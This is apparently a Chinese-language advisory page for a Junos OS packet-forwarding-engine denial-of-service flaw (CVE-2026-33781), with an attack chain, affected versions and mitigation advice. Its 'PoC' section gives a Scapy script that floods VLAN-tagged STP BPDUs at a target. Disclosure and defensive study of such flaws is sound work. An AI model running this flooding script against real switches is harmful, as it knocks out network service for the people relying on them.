CVE-2026-33781 CVSS 6.5 中危

CVE-2026-33781 Junos OS PFE拒绝服务漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33781

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Juniper Networks Junos OS

漏洞概述

Juniper Networks Junos OS在EX4k和QFX5k系列设备的包转发引擎（PFE）中存在一个检查异常条件不当的漏洞。在特定的VXLAN场景下，如果设备作为服务提供商边缘设备配置，且在用户网络接口（UNI）上启用了L2PT，在网络节点接口（NNI）上启用了VSTP，未认证的邻接攻击者可以通过向UNI发送VSTP BPDUs数据包触发该漏洞。这将导致数据包缓冲区分配失败，进而造成设备完全拒绝服务，需要手动重启才能恢复。

技术细节

该漏洞源于Juniper Networks Junos OS在特定硬件平台（EX4k和QFX5k）上的包转发引擎（PFE）中存在对异常条件检查不当的缺陷。漏洞触发的前提条件较为苛刻，必须满足以下部署场景：设备作为服务提供商边缘设备，在VXLAN架构下，用户网络接口（UNI）启用了L2PT（二层协议隧道），同时网络节点接口（NNI）启用了VSTP（VLAN生成树协议）。在这种配置下，PFE处理逻辑存在漏洞，当攻击者从邻接网络向UNI接口发送VSTP桥接协议数据单元（BPDU）时，系统无法正确处理该异常流量。这会导致PFE的数据包缓冲区分配机制发生故障，进而耗尽资源或导致处理进程挂起。最终结果是设备彻底停止转发任何业务流量，造成完全的拒绝服务（DoS）。由于系统资源已锁定或崩溃，设备无法自动恢复，必须由管理员进行手动重启干预，严重影响网络的高可用性。

攻击链分析

STEP 1

侦察

攻击者识别目标网络中使用的Juniper Networks EX4k或QFX5k系列设备，并确认其运行Junos OS。

STEP 2

配置探测

攻击者探测并确认目标设备配置了VXLAN，且在UNI接口启用了L2PT，在NNI接口启用了VSTP。

STEP 3

漏洞利用

攻击者作为邻接网络节点，向受害设备的UNI接口发送大量或特制的VSTP BPDU数据包。

STEP 4

拒绝服务

目标设备的PFE因处理异常BPDU导致数据包缓冲区分配失败，设备停止转发流量，发生DoS。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

from scapy.all import *

# Define target interface and MAC
conf.iface = "eth0"
target_mac = "00:11:22:33:44:55" # Replace with actual gateway MAC
target_vlan = 100 # Replace with target VLAN ID

# Construct Ethernet frame with 802.1Q tag
ether = Ether(dst=target_mac)
dot1q = Dot1Q(vlan=target_vlan)

# Construct VSTP BPDU payload (LLC + STP)
# VSTP uses standard STP BPDU format encapsulated in LLC
llc = LLC(dsap=0x42, ssap=0x42, ctrl=0x03)
stp = STP(bpdutype=0x00, bpduflags=0x00, rootid=0x8000, rootpathcost=0, bridgeid=0x8000, portid=0x8001, messageage=0, maxage=20, hellotime=2, fwddelay=15)

# Assemble packet
packet = ether / dot1q / llc / stp

# Send packets continuously to trigger the buffer allocation failure
print("[*] Sending VSTP BPDUs to trigger DoS...")
sendp(packet, inter=0.1, count=1000, loop=1)

影响范围

Junos OS 24.4 releases before 24.4R2

Junos OS 25.2 releases before 25.2R1-S1, 25.2R2

防御指南

临时缓解措施

如果无法立即升级补丁，建议检查并临时禁用UNI接口上的L2PT功能或NNI接口上的VSTP功能，但这可能会影响二层网络协议的正常传输。同时，应在网络边界实施严格的访问控制策略，限制不必要的BPDU流量进入核心网络。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-33781
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-33781
3 Details https://www.cvedetails.com/cve/CVE-2026-33781/
4 VulDB https://vuldb.com/cve/CVE-2026-33781
5 Link https://kb.juniper.net/JSA107869

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表